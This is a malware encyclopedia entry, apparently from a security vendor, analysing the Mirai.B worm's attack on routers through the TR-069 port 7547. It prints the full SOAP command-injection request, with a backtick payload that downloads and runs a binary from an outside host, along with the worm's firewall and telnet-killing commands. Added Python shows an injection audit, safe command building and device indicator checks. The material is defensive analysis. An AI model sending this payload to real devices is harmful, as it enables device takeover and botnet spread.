Linux/Mirai.B!worm
Analysis
Linux/Mirai.B!worm is a bot that runs on Linux systems where BusyBox is available. It particularly targets IoT devices such as home routers and modems.
Its well-known variant, Linux/Mirai.A!worm, caused DDoS outages at several companies and websites. So far, Linux/Mirai.B!worm is reported to have affected a German operator.
The malware exploits a known command-injection flaw in the remote-management interface that routers and modems expose on TCP port 7547, the port used by the TR-069 configuration protocol.
The TR-069 protocol is used by operators to remotely manage routers and modems.
With TR-069, an operator can:
- Get information on the router or modem
- Run DSL diagnostics
- Set the device's time and NTP servers
- ...
Linux/Mirai.B!worm exploits this flaw by crafting a SetNTPServers request that is supposed to configure a new NTP server. Instead of the name of a valid NTP server, it supplies shell commands wrapped in backticks; the vulnerable firmware hands the value to a shell without validating it, so the shell runs the commands and downloads a malicious payload from a remote server. For example:
    <?xml version="1.0"?>
    <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <SOAP-ENV:Body>
        <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
          <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2`</NewNTPServer1>
          <NewNTPServer2></NewNTPServer2>
          <NewNTPServer3></NewNTPServer3>
          <NewNTPServer4></NewNTPServer4>
          <NewNTPServer5></NewNTPServer5>
        </u:SetNTPServers>
      </SOAP-ENV:Body>
    </SOAP-ENV:Envelope>
In this case, the sample sets the first NTP server to
    `cd /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2`
The backticks make the shell execute the enclosed commands: change to the /tmp directory, download a file named 2 from the host l.ocalhost.host (note that this is a real domain, not localhost; at the time of writing the name no longer resolves), mark the file executable and run it. Because the value is taken straight from the request, anyone who can reach port 7547 can run arbitrary commands on the device with the privileges of the management service.
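The following is an added example, not code from the original page or from any vendor firmware. It parses a SetNTPServers request like the one above, pulls out the five NewNTPServer fields, and shows both the flawed handling (pasting the field into a shell command line) and the hardened handling (validate as hostname or IP, then pass it as a single argv element). The malicious request is the one shown on the page; the benign request, the `ntpclient -h` command name and the `audit_request` / `build_command_*` helpers are assumptions made for the example.

```python
import ipaddress
import re
import xml.etree.ElementTree as ET

TIME_NS = "urn:dslforum-org:service:Time:1"  # namespace of the SetNTPServers action

# POSIX shell metacharacters. A hostname or IP address never contains any of them,
# so their presence in an NTP server field is a reliable sign of injection.
SHELL_META = re.compile(r"[`$;|&<>(){}\\\"'\s]")

# RFC 1123 hostname: 1-63 char labels of [A-Za-z0-9-] that neither start nor end with '-'.
HOSTNAME = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*\.?$"
)

# The request as shown on the page, reproduced here as test input.
MALICIOUS_REQUEST = """<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
    SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  <SOAP-ENV:Body>
    <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
      <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2`</NewNTPServer1>
      <NewNTPServer2></NewNTPServer2>
      <NewNTPServer3></NewNTPServer3>
      <NewNTPServer4></NewNTPServer4>
      <NewNTPServer5></NewNTPServer5>
    </u:SetNTPServers>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>"""

# A constructed benign request for comparison (same envelope, a real NTP pool name).
BENIGN_REQUEST = MALICIOUS_REQUEST.replace(
    "`cd /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2`", "pool.ntp.org"
)


def is_valid_server(value):
    """True only for a bare IPv4/IPv6 address or an RFC 1123 hostname."""
    if not value or SHELL_META.search(value):
        return False
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return bool(HOSTNAME.match(value))


def extract_ntp_servers(soap_xml):
    """Return the NewNTPServer1..5 values of a SetNTPServers request, in order."""
    root = ET.fromstring(soap_xml)
    action = root.find(".//{%s}SetNTPServers" % TIME_NS)
    if action is None:
        raise ValueError("not a SetNTPServers request")
    servers = []
    for i in range(1, 6):
        el = action.find("NewNTPServer%d" % i)  # child elements carry no namespace
        servers.append((el.text or "").strip() if el is not None else "")
    return servers


def audit_request(soap_xml):
    """'accept' if every non-empty server field is a valid host/IP, else 'reject'
    together with the (field number, value) pairs that failed validation."""
    servers = extract_ntp_servers(soap_xml)
    bad = [(i + 1, s) for i, s in enumerate(servers) if s and not is_valid_server(s)]
    return {"servers": servers, "verdict": "reject" if bad else "accept", "rejected": bad}


def build_command_unsafe(server):
    """The flawed pattern: the field is pasted into a shell command line. The shell
    performs the backtick substitution before the (hypothetical) ntpclient binary
    ever runs, which is exactly what the sample relies on. Shown, never executed."""
    return "ntpclient -h " + server


def build_command_safe(server):
    """Hardened version: validate, then pass the value as one argv element so no
    shell ever parses it (run it with subprocess.run(argv), never shell=True)."""
    if not is_valid_server(server):
        raise ValueError("rejected NTP server value: %r" % server)
    return ["ntpclient", "-h", server]


if __name__ == "__main__":
    for name, req in (("malicious", MALICIOUS_REQUEST), ("benign", BENIGN_REQUEST)):
        print(name, audit_request(req))
```

The same `audit_request` check can be run over request bodies captured at a honeypot or proxy in front of port 7547: any SetNTPServers request whose verdict is "reject" is an exploitation attempt, and the rejected field contains the attacker's download command and host.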
An infected device then does the following:
- Scans other hosts for an open TCP port 7547 (the TR-069 port). If the port is open, it attempts to infect the host by POSTing the SOAP request shown above.
- Blocks port 7547 on itself so that competing bots cannot re-infect it, using a single iptables rule (this also cuts off legitimate TR-069 management by the operator):
    busybox iptables -A INPUT -p tcp --destination-port 7547 -j DROP
- Kills the telnet daemon as well, closing the other common entry point:
    busybox killall -9 telnetd
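The two post-infection changes above are also the cheapest indicators to check on a suspect device. The script below is an added example, not part of the original page or of any vendor tooling: it inspects the output of `busybox iptables -S INPUT` and `busybox ps` for the DROP rule on port 7547, a missing telnetd and any process running out of /tmp (where the page says the payload is downloaded and executed). The sample outputs are constructed, the exact `ps` column layout of a given BusyBox build may differ, and `collect_live()` must run as root on the device itself.

```python
import re
import subprocess

TR069_PORT = 7547

# Constructed output of `busybox iptables -S INPUT`; the last rule is the one the worm
# adds (iptables prints --destination-port in its short form, --dport).
IPTABLES_INFECTED = """-P INPUT ACCEPT
-A INPUT -i lo -j ACCEPT
-A INPUT -p tcp -m tcp --dport 7547 -j DROP
"""
IPTABLES_CLEAN = """-P INPUT ACCEPT
-A INPUT -i lo -j ACCEPT
"""

# Constructed BusyBox `ps` output. On the infected device telnetd has been killed
# and the downloaded payload is running out of /tmp.
PS_INFECTED = """  PID USER       VSZ STAT COMMAND
    1 root      1204 S    init
  612 root       812 S    /tmp/2
"""
PS_CLEAN = """  PID USER       VSZ STAT COMMAND
    1 root      1204 S    init
  300 root       916 S    telnetd -l /bin/login
"""

DROP_RULE = re.compile(r"^-A INPUT\b.*\s-p tcp\b.*--dport %d\b.*-j DROP" % TR069_PORT, re.M)


def port_7547_dropped(iptables_s):
    """True if the INPUT chain drops inbound TCP 7547, as the worm configures it."""
    return bool(DROP_RULE.search(iptables_s))


def process_commands(ps_text):
    """Command column of each ps line (header skipped; first four columns fixed)."""
    cmds = []
    for line in ps_text.splitlines()[1:]:
        parts = line.split(None, 4)
        if len(parts) == 5:
            cmds.append(parts[4])
    return cmds


def telnetd_running(ps_text):
    return any(c.split()[0].endswith("telnetd") for c in process_commands(ps_text))


def tmp_executables(ps_text):
    """Processes whose binary lives under /tmp, e.g. the worm's ./2 payload."""
    return [c for c in process_commands(ps_text) if c.split()[0].startswith("/tmp/")]


def assess(iptables_s, ps_text):
    """Combine the indicators. A single hit is weak evidence (a hardened device may
    legitimately drop 7547, a device may simply not ship telnetd), so the verdict
    requires at least two of the three."""
    indicators = {
        "port_7547_dropped": port_7547_dropped(iptables_s),
        "telnetd_missing": not telnetd_running(ps_text),
        "tmp_processes": tmp_executables(ps_text),
    }
    hits = sum([indicators["port_7547_dropped"],
                indicators["telnetd_missing"],
                bool(indicators["tmp_processes"])])
    indicators["verdict"] = "suspicious" if hits >= 2 else "clean"
    return indicators


def collect_live():
    """Run on the device itself (root needed for iptables) and assess live output."""
    ipt = subprocess.run(["busybox", "iptables", "-S", "INPUT"],
                         capture_output=True, text=True).stdout
    ps = subprocess.run(["busybox", "ps"], capture_output=True, text=True).stdout
    return assess(ipt, ps)


if __name__ == "__main__":
    print("infected sample:", assess(IPTABLES_INFECTED, PS_INFECTED))
    print("clean sample:   ", assess(IPTABLES_CLEAN, PS_CLEAN))
```

Because none of the three indicators survives a reboot on its own, run the check before rebooting if you want evidence of the infection; afterwards only the firmware version and the exposure of port 7547 remain meaningful.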
Recommended Action
To clean the device:
- Reboot it. The malware runs from /tmp and does not persist across a reboot.
- Update the device's firmware (if an update is available) so that it is no longer vulnerable. A rebooted but unpatched device that is still reachable on port 7547 from the Internet will be re-infected by the next scan, so until the fix is applied, port 7547 should be blocked upstream or restricted to the operator's management network.
Detection Availability
Product | Database |
---|---|
FortiClient | Extreme |
FortiMail | Extreme |
FortiSandbox | Extreme |
FortiWeb | Extreme |
Web Application Firewall | Extreme |
FortiIsolator | Extreme |
FortiDeceptor | Extreme |
FortiEDR | |
Version Updates
Date | Version | Detail |
---|---|---|
2019-04-02 | 67.50600 | Sig Updated |